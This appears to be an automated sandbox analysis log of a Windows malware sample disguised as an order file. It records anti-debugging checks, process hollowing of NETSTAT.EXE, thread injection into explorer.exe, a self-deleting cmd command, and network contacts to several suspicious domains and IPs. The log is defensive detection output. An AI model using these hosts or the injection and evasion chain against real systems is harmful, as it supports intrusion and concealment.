Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01068CD6 mov eax, dword ptr fs:[00000030h] 5_2_01068CD6
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCF527 mov eax, dword ptr fs:[00000030h] 5_2_00FCF527
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016CF0 mov eax, dword ptr fs:[00000030h] 5_2_01016CF0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010514FB mov eax, dword ptr fs:[00000030h] 5_2_010514FB
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0106070D mov eax, dword ptr fs:[00000030h] 5_2_0106070D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102FF10 mov eax, dword ptr fs:[00000030h] 5_2_0102FF10
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA76E2 mov eax, dword ptr fs:[00000030h] 5_2_00FA76E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC16E0 mov ecx, dword ptr fs:[00000030h] 5_2_00FC16E0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC36CC mov eax, dword ptr fs:[00000030h] 5_2_00FC36CC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD8EC7 mov eax, dword ptr fs:[00000030h] 5_2_00FD8EC7
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051751 mov eax, dword ptr fs:[00000030h] 5_2_01051751
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01068F6A mov eax, dword ptr fs:[00000030h] 5_2_01068F6A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBAE73 mov eax, dword ptr fs:[00000030h] 5_2_00FBAE73
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01017794 mov eax, dword ptr fs:[00000030h] 5_2_01017794
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA766D mov eax, dword ptr fs:[00000030h] 5_2_00FA766D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h] 5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9E620 mov eax, dword ptr fs:[00000030h] 5_2_00F9E620
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCA61C mov eax, dword ptr fs:[00000030h] 5_2_00FCA61C
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9C600 mov eax, dword ptr fs:[00000030h] 5_2_00F9C600
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h] 5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB5600 mov ecx, dword ptr fs:[00000030h] 5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC8E00 mov eax, dword ptr fs:[00000030h] 5_2_00FC8E00
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD37F5 mov eax, dword ptr fs:[00000030h] 5_2_00FD37F5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051608 mov eax, dword ptr fs:[00000030h] 5_2_01051608
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0104FE3F mov eax, dword ptr fs:[00000030h] 5_2_0104FE3F
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105AE44 mov eax, dword ptr fs:[00000030h] 5_2_0105AE44
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA8794 mov eax, dword ptr fs:[00000030h] 5_2_00FA8794
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102FE87 mov eax, dword ptr fs:[00000030h] 5_2_0102FE87
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAFF60 mov eax, dword ptr fs:[00000030h] 5_2_00FAFF60
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01060EA5 mov eax, dword ptr fs:[00000030h] 5_2_01060EA5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010146A7 mov eax, dword ptr fs:[00000030h] 5_2_010146A7
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAEF40 mov eax, dword ptr fs:[00000030h] 5_2_00FAEF40
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0104FEC0 mov eax, dword ptr fs:[00000030h] 5_2_0104FEC0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB73D mov eax, dword ptr fs:[00000030h] 5_2_00FBB73D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCE730 mov eax, dword ptr fs:[00000030h] 5_2_00FCE730
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC3F33 mov eax, dword ptr fs:[00000030h] 5_2_00FC3F33
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01068ED6 mov eax, dword ptr fs:[00000030h] 5_2_01068ED6
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F94F2E mov eax, dword ptr fs:[00000030h] 5_2_00F94F2E
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4710 mov eax, dword ptr fs:[00000030h] 5_2_00FC4710
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBF716 mov eax, dword ptr fs:[00000030h] 5_2_00FBF716
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCA70E mov eax, dword ptr fs:[00000030h] 5_2_00FCA70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B138A mov eax, dword ptr fs:[00000030h] 14_2_038B138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382138B mov eax, dword ptr fs:[00000030h] 14_2_0382138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038AD380 mov ecx, dword ptr fs:[00000030h] 14_2_038AD380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03801B8F mov eax, dword ptr fs:[00000030h] 14_2_03801B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382B390 mov eax, dword ptr fs:[00000030h] 14_2_0382B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03822397 mov eax, dword ptr fs:[00000030h] 14_2_03822397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_037FDB60 mov ecx, dword ptr fs:[00000030h] 14_2_037FDB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_037FF358 mov eax, dword ptr fs:[00000030h] 14_2_037FF358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C5BA5 mov eax, dword ptr fs:[00000030h] 14_2_038C5BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03824BAD mov eax, dword ptr fs:[00000030h] 14_2_03824BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_037FDB40 mov eax, dword ptr fs:[00000030h] 14_2_037FDB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038753CA mov eax, dword ptr fs:[00000030h] 14_2_038753CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h] 14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381DBE9 mov eax, dword ptr fs:[00000030h] 14_2_0381DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038A23E3 mov ecx, dword ptr fs:[00000030h] 14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038A23E3 mov eax, dword ptr fs:[00000030h] 14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h] 14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B131B mov eax, dword ptr fs:[00000030h] 14_2_038B131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C8B58 mov eax, dword ptr fs:[00000030h] 14_2_038C8B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03823B7A mov eax, dword ptr fs:[00000030h] 14_2_03823B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382D294 mov eax, dword ptr fs:[00000030h] 14_2_0382D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0380AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0380AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382FAB0 mov eax, dword ptr fs:[00000030h] 14_2_0382FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_037F9240 mov eax, dword ptr fs:[00000030h] 14_2_037F9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03822ACB mov eax, dword ptr fs:[00000030h] 14_2_03822ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B4AEF mov eax, dword ptr fs:[00000030h] 14_2_038B4AEF
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Order No00020212910.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\user\Desktop\Order No00020212910.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.beautyloungeacademyllc.com
Source: C:\Windows\explorer.exe Domain query: www.collegedalerealtor.com
Source: C:\Windows\explorer.exe Domain query: www.inkedbreadco.com
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe Network Connect: 74.220.199.6 80
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe Domain query: www.xpatfone.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.xrxgqf.website
Source: C:\Windows\explorer.exe Domain query: www.shoppingvipshopping.space
Source: C:\Windows\explorer.exe Domain query: www.lasnochesdeluces.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Order No00020212910.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: CB0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Order No00020212910.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Order No00020212910.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Order No00020212910.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Order No00020212910.exe Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3352
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Order No00020212910.exe Process created: C:\Users\user\Desktop\Order No00020212910.exe C:\Users\user\Desktop\Order No00020212910.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order No00020212910.exe'
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.321178794.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.297928991.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Users\user\Desktop\Order No00020212910.exe VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
